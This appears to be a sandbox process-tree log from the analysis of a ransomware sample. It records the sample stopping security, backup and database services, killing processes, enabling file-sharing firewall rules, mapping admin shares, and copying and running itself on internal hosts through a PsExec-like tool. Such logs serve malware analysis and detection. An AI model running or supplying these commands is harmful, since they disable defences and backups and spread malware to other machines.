C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵PID:5056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵PID:4496
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:4572
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:2152
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵PID:4512
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵PID:3828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵PID:4692
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMTA /y2⤵PID:3464
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵PID:4480
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵PID:4544
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVService /y2⤵PID:4616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵PID:4332
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵PID:4232
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵PID:3088
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SntpService /y2⤵PID:4288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵PID:4384
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵PID:4908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵PID:3940
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵PID:4424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵PID:4884
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵PID:4468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵
- Suspicious use of WriteProcessMemory
PID:2492
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeadtopology /y2⤵PID:5052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵PID:4868
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵PID:4768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵PID:4636
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:5032
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵PID:4488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵PID:4136
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵PID:3000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵PID:4048
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵PID:4860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵PID:4112
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophossps /y2⤵PID:2612
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_service /y2⤵PID:4108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵PID:4120
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:3136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:4560
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop UI0Detect /y2⤵PID:4328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵PID:4788
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSA /y2⤵PID:2568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵PID:5012
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵PID:5116
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵PID:4632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵PID:748
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵PID:4536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵PID:4332
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵PID:4352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵PID:3336
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_filter /y2⤵PID:4844
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵PID:1616
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵PID:1084
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵PID:4852
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵PID:2976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵PID:3848
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update /y2⤵PID:4460
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵PID:4824
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵PID:4964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵PID:2600
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPS /y2⤵
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵PID:5096
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeimap4 /y2⤵PID:4748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵PID:5000
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop svcGenericHost /y2⤵PID:2364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵PID:3148
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:4420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:4476
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵PID:4828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵PID:4244
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵PID:4156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵PID:4948
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ARSM /y2⤵PID:2420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵PID:692
-
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:4612
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update_64 /y2⤵PID:5080
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵PID:2596
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵PID:4336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵PID:4692
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop W3Svc /y2⤵PID:3672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵PID:4448
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:4280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵PID:4480
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵PID:4780
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵PID:4656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵PID:4252
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TmCCSF /y2⤵PID:2252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵PID:4428
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵PID:3992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵PID:4576
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵PID:4752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵PID:4736
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSRS /y2⤵PID:4456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵PID:2144
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLBrowser /y2⤵PID:4932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵PID:5020
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop WRSVC /y2⤵PID:4864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵PID:4220
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵PID:4344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵PID:4636
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵PID:5064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵PID:4476
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop tmlisten /y2⤵PID:1112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵PID:4840
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵PID:1872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵PID:4676
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵PID:2732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵PID:4304
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:5108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:2976
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop audioendpointbuilder /y2⤵PID:1616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵PID:360
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop vapiendpoint /y2⤵PID:4844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵PID:1676
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵PID:4352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵PID:4596
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKey /y2⤵PID:4436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵PID:4340
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵PID:3464
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:4192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵PID:4540
-
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.36 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵PID:4100
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵PID:4188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵PID:4444
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AVP /y2⤵PID:4560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵PID:4692
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵PID:192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵PID:4732
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:1556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:748
-
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.10 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵PID:3664
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:4660
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:3336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵PID:4524
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DCAgent /y2⤵PID:4440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵PID:5104
-
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.38 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵PID:4784
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.11 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵PID:4956
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.41 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵PID:4244
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵PID:4868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵PID:504
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\Users2⤵PID:4256
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:5032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:4488
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵PID:2612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵PID:5072
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵PID:2568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵PID:1632
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\A$2⤵PID:5048
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵PID:4208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵PID:3464
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵PID:2252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵PID:2304
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\B$2⤵PID:4456
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\C$2⤵PID:4996
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵PID:1720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵PID:4948
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\D$2⤵PID:1272
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:4176
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:692
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\E$2⤵PID:4020
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROD /y2⤵PID:4480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵PID:4260
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\F$2⤵PID:2684
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:4984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:4332
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\G$2⤵PID:4960
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:4348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:5104
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\H$2⤵PID:2408
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵PID:4188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵PID:4660
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵PID:4376
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\I$2⤵PID:4352
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\Users2⤵PID:4112
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\J$2⤵PID:1512
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵PID:1500
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Antivirus /y2⤵PID:4808
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵PID:4652
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\K$2⤵PID:4548
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\A$2⤵PID:4224
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:428
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2688
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:4232
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y4⤵PID:5020
-
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\L$2⤵PID:3656
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\B$2⤵PID:3136
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
PID:4472
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\M$2⤵PID:5024
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\C$2⤵PID:4100
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\N$2⤵PID:2568
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
PID:4932 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵PID:4904
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\D$2⤵PID:1140
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.14 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵PID:5108
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\O$2⤵PID:4596
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\E$2⤵PID:3892
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
PID:1692 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵PID:4828
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵PID:4332
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\F$2⤵PID:2156
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\P$2⤵PID:1020
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵PID:3984
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\Q$2⤵PID:4444
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\G$2⤵PID:4692
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\R$2⤵PID:4332
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵PID:4324
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\H$2⤵PID:5068
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\S$2⤵PID:1276
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\I$2⤵PID:4560
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
PID:4136 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵PID:2684
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\T$2⤵PID:4440
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\J$2⤵PID:1528
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.27 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵PID:4668
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\U$2⤵PID:4272
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\K$2⤵PID:4460
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵PID:3748
-
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵PID:2976
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\V$2⤵PID:4468
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.21 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵PID:4992
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\L$2⤵PID:4700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵PID:4592
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\W$2⤵PID:4632
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\M$2⤵PID:4280
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵PID:3856
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\X$2⤵PID:4584
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\N$2⤵PID:4860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵PID:4576
-
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
PID:4224
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\Y$2⤵PID:1720
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\O$2⤵PID:2568
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\Z$2⤵PID:4864
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\P$2⤵PID:4788
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
PID:4120
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\Q$2⤵PID:4604
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
PID:4540
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\R$2⤵PID:5112
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\S$2⤵PID:3428
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
PID:4404
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
PID:4592
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\T$2⤵PID:2404
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
PID:2832
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\U$2⤵PID:1544
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\V$2⤵PID:5016
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵PID:2492
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\W$2⤵PID:4804
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
PID:2600
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\X$2⤵PID:4100
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\Y$2⤵PID:3856
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
PID:5104
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\Z$2⤵PID:4676
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
PID:4808
-
-
